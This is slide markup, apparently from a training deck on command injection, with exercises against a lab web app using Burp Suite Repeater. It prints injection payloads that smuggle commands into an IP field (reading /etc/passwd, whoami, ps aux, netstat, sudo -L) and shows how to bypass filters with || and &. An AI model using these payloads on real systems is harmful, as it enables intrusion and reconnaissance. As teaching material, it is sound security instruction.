              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Send the request to Repeater. Update the IP address to use the same payloads you delivered previously.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1150" name="Google Shape;1150;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1" name="Google Shape;1151;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1938325"/>
            <a:ext cx="9144000" cy="29682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Command Injection Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1157" name="Google Shape;1157;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t>Enable Foxy Proxy, launch Burp Suite, and intercept a request through the IP address form.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Send the request to Repeater. Update the IP address to use the same payloads you delivered previously.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1158" name="Google Shape;115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9" name="Google Shape;1159;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1938325"/>
            <a:ext cx="9144000" cy="2968200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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FF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>ip=8.8.4.4;%20cat%20/etc/passwd&amp;Submit=submit </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FF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>ip=8.8.4.4;%20whoami&amp;Submit=submit</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FF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>ip=8.8.4.4;%20uname&amp;Submit=submit</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>ip=8.8.4.4;%20ps%20aux&amp;Submit=submit</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Test for command injection vulnerabilities.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Bypass basic command injection filters. </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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>commix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to automatically scan for command injection points.  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1034" name="Google Shape;1034;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513375" y="13262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7040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123811"/>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72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2516200" y="1545675"/>
            <a:ext cx="60345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When PHP code removes &amp;&amp; and ; from user submitted commands, thus preventing injection, attackers can still use two other commands:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>double</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t> brackets) and &amp; (single ampersand)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1165" name="Google Shape;116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1" name="Google Shape;1171;p7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 | and &amp;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="F1C23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7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177" name="Google Shape;1177;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7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Loud Pipes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 | and &amp; to bypass a simple user-input filter.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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Review #1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1184" name="Google Shape;1184;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500">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Click Command Injection in the left navigation bar, and make sure your security level is set to medium. Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> to:</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>Check the installed version of Perl</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>List running network services (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>Create a file, then check if it was created</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1185" name="Google Shape;1185;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6" name="Google Shape;1186;p75"/>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#1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1192" name="Google Shape;1192;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500">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Click Command Injection in the left navigation bar, and make sure your security level is set to medium. Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> to:</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>Check the installed version of Perl</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>List running network services (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>Create a file, then check if it was created</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1193" name="Google Shape;119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6"/>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Check the installed version of Perl</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bad_ip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> perl --version</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List running network services (`netstat`)</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bad_ip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> netstat -ta</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Create a file, then check if it was created</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bad_ip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> touch experiment</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="145000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>bad_ip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> ls</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>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#2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1200" name="Google Shape;1200;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1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Launch Burp Suite. Send an IP address through the form; intercept the request; and send it to Repeater. Use Repeater and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> operator to:</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>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/etc</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/home</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Print the commands you can run with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>sudo -L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1201" name="Google Shape;1201;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7"/>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#2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1208" name="Google Shape;1208;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sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Launch Burp Suite. Send an IP address through the form; intercept the request; and send it to Repeater. Use Repeater and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> operator to:</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>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/etc</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List the contents of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>/home</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Print the commands you can run with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>sudo -L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
